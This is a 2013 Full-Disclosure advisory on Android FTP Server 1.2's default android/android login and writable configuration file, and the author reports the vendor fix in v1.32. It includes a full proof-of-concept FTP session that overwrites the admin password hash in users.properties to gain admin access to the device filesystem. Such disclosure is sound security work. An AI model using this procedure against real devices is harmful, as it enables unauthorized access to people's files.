[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] Remote access to Android ftp server 1.2 configuration file allows login as admin
- To: full <full-disclosure@xxxxxxxxxxxxxxxxx>
- Subject: [Full-disclosure] Remote access to Android ftp server 1.2 configuration file allows login as admin
- From: "Larry W. Cashdollar" <larry0@xxxxxx>
- Date: Sun, 22 Sep 2013 13:06:00 +0000 (GMT)
<html><body><div><b style="font-family: Times; font-size: medium; line-height:
normal; ">Remote access to Android ftp server 1.2 configuration file allows
login as admin</b><span style="font-family: Times; font-size: medium;
line-height: normal; "> </span></div><div><br style="font-family: Times;
font-size: medium; line-height: normal; "><span style="font-family: Times;
font-size: medium; line-height: normal; ">Date: 9/7/2013</span><br
style="font-family: Times; font-size: medium; line-height: normal; "><span
style="font-family: Times; font-size: medium; line-height: normal; ">Author:
Larry W. Cashdollar, @_larry0 </span><br style="font-family: Times;
font-size: medium; line-height: normal; "><p style="font-family: Times;
font-size: medium; line-height: normal; ">Download: <a
href="http://www.amazon.com/888bid-com-Android-FTP-Server/dp/B00COVVAZM/ref=sr_1_1?s=mobile-apps";>http://www.amazon.com/888bid-com-Android-FTP-Server/dp/B00COVVAZM/ref=sr_1_1?s=mobile-apps</a></p><p
style="font-family: Times; font-size: medium; line-height: normal;
"><br></p><p style="font-family: Times; font-size: medium; line-height: normal;
">Description: "Transfer files between Android devices and computers without a
USB cable and Windows software driver. Transfer files to and from your Android
device over the Internet. Use Windows Explorer to transfer files between your
Android device and your computer by drag and drop. You can add additional users
with read only permission for download, and read and write permission for both
upload and download."</p><p style="font-family: Times; font-size: medium;
line-height: normal; ">Vulnerability:</p><ol style="font-family: Times;
font-size: medium; line-height: normal; "><li>Software installs with default
user credentials android/android. This allows remote attackers to trivially
gain access to the devices storage.</li><li>ftp server exposes configuration
file and allows read/write. Allowing a remote user to overwrite the credentials
for admin login giving further access to the file system on the device. The
application is sandboxed however so impact is limited.</li></ol><b
style="font-family: Times; font-size: medium; line-height: normal;
">PoC:</b><span style="font-family: Times; font-size: medium; line-height:
normal; "></span><dd style="font-family: Times; font-size: medium; line-height:
normal; "></dd><p style="font-family: Times; font-size: medium; line-height:
normal; ">Edit the users.properties file and re-upload.</p><pre
style="line-height: normal; ">Connected to 192.168.0.29.
220 Service ready for new user.
Name (192.168.0.29:larry): android
331 User name okay, need password for android.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
ftp> cd ftpConfig
250 Directory changed to /ftpConfig
ftp> ls
229 Entering Passive Mode (|||49825|)
150 File status okay; about to open data connection.
-rw------- 1 user group 679 Sep 7 16:37 users.properties
226 Closing data connection.
ftp> get users.properties
local: users.properties remote: users.properties
229 Entering Passive Mode (|||59616|)
150 File status okay; about to open data connection.
100% |********************************************| 695 9.60 MiB/s
--:-- ETA
226 Transfer complete.
695 bytes received in 00:00 (121.85 KiB/s)
ftp>
</pre><span style="font-family: Times; font-size: medium; line-height: normal;
">If we take a look at the users.properties file:</span><pre
style="line-height: normal; ">#Generated file - don't edit (please)
#Sat Sep 07 16:13:44 EDT 2013
ftpserver.user.android.enableflag=true
ftpserver.user.admin.maxloginnumber=0
ftpserver.user.android.writepermission=true
ftpserver.user.android.idletime=0
ftpserver.user.admin.homedirectory=/mnt/sdcard <-change to /
ftpserver.user.admin.writepermission=true
ftpserver.user.admin.maxloginperip=0
ftpserver.user.android.homedirectory=/sdcard
ftpserver.user.admin.userpassword=21232F297A57A5A743894A0E4A801FC3 <-
replace with 23594328\:070A6394BF17CD0A401F12ACC021714F 'android' password [1]
ftpserver.user.admin.downloadrate=0
ftpserver.user.admin.enableflag=true
ftpserver.user.admin.idletime=0
ftpserver.user.admin.uploadrate=0
ftpserver.user.android.userpassword=23594328\:070A6394BF17CD0A401F12ACC021714F
</pre><p style="font-family: Times; font-size: medium; line-height: normal;
">upload file as android/android user to ftpConfig/users.properties The next
time the ftp server is started (on/off button in app interface) you can login
as admin.</p><p style="font-family: Times; font-size: medium; line-height:
normal; ">login as admin/android</p><p style="font-family: Times; font-size:
medium; line-height: normal; ">ftp> user admin<br>331 User name okay, need
password for admin. Password: <br>230 User logged in, proceed.<br>Remote
system type is UNIX.<br>ftp> dir<br>229 Entering Passive Mode
(|||52585|)<br>150 File status okay; about to open data connection.</p><pre
style="line-height: normal; ">dr-x------ 3 user group 0 Jul 11
20:09 acct
d--x------ 3 user group 0 Aug 17 09:09 cache
d--x------ 3 user group 0 Jul 11 20:09 config
dr-x------ 3 user group 0 Dec 31 1969 d
d--x------ 3 user group 0 Sep 16 2012 data
dr-x------ 3 user group 0 Jul 11 20:15 dev
d--x------ 3 user group 0 Sep 2 14:07 dropbox
dr-x------ 3 user group 0 Mar 29 13:48 etc
dr-x------ 3 user group 0 Jul 11 20:09 mnt
dr-x------ 3 user group 0 Dec 31 1969 proc
d--x------ 3 user group 0 Feb 26 2013 root
d--x------ 3 user group 0 Dec 31 1969 sbin
drwx------ 3 user group 0 Sep 7 15:09 sdcard
dr-x------ 3 user group 0 Jul 11 20:09 sys
dr-x------ 3 user group 0 Mar 29 13:49 system
dr-x------ 3 user group 0 Mar 29 13:49 vendor
-r-------- 1 user group 118 Dec 31 1969 default.prop
---------- 1 user group 94200 Dec 31 1969 init
---------- 1 user group 1677 Dec 31 1969 init.goldfish.rc
---------- 1 user group 11658 Dec 31 1969 init.omap4430.rc
---------- 1 user group 14869 Dec 31 1969 init.rc
-r-------- 1 user group 0 Dec 31 1969 ueventd.goldfish.rc
-r-------- 1 user group 840 Dec 31 1969 ueventd.omap4430.rc
-r-------- 1 user group 4203 Dec 31 1969 ueventd.rc
</pre><p style="font-family: Times; font-size: medium; line-height: normal;
">226 Closing data connection.<br>ftp></p><br style="font-family: Times;
font-size: medium; line-height: normal; "><span style="font-family: Times;
font-size: medium; line-height: normal; ">Tested on kindle fire & droid
bionic. </span></div><div><br style="font-family: Times; font-size:
medium; line-height: normal; "><span style="font-family: Times; font-size:
medium; line-height: normal; ">[1] MD5 of admin,
http://www.md5-hash.com/md5-hashing-decrypt/21232f297a57a5a743894a0e4a801fc3
but didn't allow me to login when I used
admin/admin. </span></div><div><br style="font-family: Times; font-size:
medium; line-height: normal; "><span style="font-family: Times; font-size:
medium; line-height: normal; ">Vendor: notified 9/10/2013, fixed in
v1.32.</span></div></body></html>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/